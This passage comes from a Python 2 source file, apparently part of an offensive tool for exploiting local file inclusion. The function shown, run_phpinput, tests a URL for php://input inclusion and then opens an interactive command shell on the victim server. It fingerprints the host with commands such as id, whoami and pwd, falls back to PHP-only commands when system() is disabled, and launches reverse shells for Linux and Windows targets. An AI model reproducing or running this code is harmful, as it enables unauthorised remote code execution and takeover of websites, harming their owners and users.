()
| 1215 | return got[:-1] |
| 1216 | |
| 1217 | def run_phpinput(): |
| 1218 | global ahurl |
| 1219 | global ahactive |
| 1220 | global victimOs |
| 1221 | |
| 1222 | if(ahactive is False): |
| 1223 | inputurl = raw_input("[*] Enter the php://input vulnerable url (ex: 'http://site/index.php?page=') -> ") |
| 1224 | else: |
| 1225 | inputurl = ahurl |
| 1226 | |
| 1227 | inputurl = checkHttp(inputurl) |
| 1228 | inputurl = cutURLToLastEqual(inputurl) |
| 1229 | resp = send_phpinput_cmd("echo Bodom", inputurl) |
| 1230 | got = SubstrFind(resp,"AbracadabrA **") |
| 1231 | phpcmd = False |
| 1232 | |
| 1233 | if(len(got) == 0): |
| 1234 | return |
| 1235 | if("system() has been disabled for security reasons in" in resp): |
| 1236 | phpcmd = True |
| 1237 | |
| 1238 | point = got[0]+15 |
| 1239 | print "\n[+] The website seems to be vulnerable. Opening a Shell.." |
| 1240 | |
| 1241 | if(phpcmd is False): |
| 1242 | _id = cleanOutput(extract_phpinput_res(send_phpinput_cmd("id",inputurl)), True) |
| 1243 | if(len(_id) == 0): |
| 1244 | path = cleanOutput(extract_phpinput_res(send_phpinput_cmd("path",inputurl)), True) |
| 1245 | if(checkIfWindows(path)): |
| 1246 | victimOs = "Windows" |
| 1247 | |
| 1248 | print colored("[If you want to send PHP commands rather than system commands add php:// before them (ex: php:// fwrite(fopen('a.txt','w'),\"content\");]\n","red") |
| 1249 | whoami = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("whoami",inputurl)), True)) |
| 1250 | if(victimOs != "Windows"): |
| 1251 | pwd = cleanOutput(extract_phpinput_res(send_phpinput_cmd("pwd",inputurl)), True) |
| 1252 | else: |
| 1253 | pwd = cleanOutput(extract_phpinput_res(send_phpinput_cmd("cd",inputurl)), True) |
| 1254 | else: |
| 1255 | onlyPhpPrint() |
| 1256 | whoami = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("php://get_current_user();",inputurl)), True)) |
| 1257 | pwd = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("php://getcwd();",inputurl)), True)) |
| 1258 | |
| 1259 | time.sleep(1) |
| 1260 | inputmain = removeHttpFromWebsite(extractWebsiteFromUrl(inputurl)) |
| 1261 | cmd = "" |
| 1262 | while(cmd != "exit" and cmd != "quit" and cmd != "php://exit" and cmd != "php://quit"): |
| 1263 | if(phpcmd): |
| 1264 | cmd = raw_input("%s@%s:%s$ PHP:// " %(whoami,inputmain,pwd)) |
| 1265 | if(cmd[:6] != "php://"): |
| 1266 | cmd = "php://%s" %cmd |
| 1267 | else: |
| 1268 | cmd = raw_input("%s@%s:%s$ " %(whoami,inputmain,pwd)) |
| 1269 | if(cmd != "exit" and cmd != "quit" and cmd != "php://exit" and cmd != "php://quit"): |
| 1270 | if(phpcmd is False and checkIfReverseShell(cmd)): |
| 1271 | if(victimOs != "Windows"): |
| 1272 | phpinput_reverse_shell(inputurl) |
| 1273 | else: |
| 1274 | windows_phpinput_reverse_shell(inputurl) |
no test coverage detected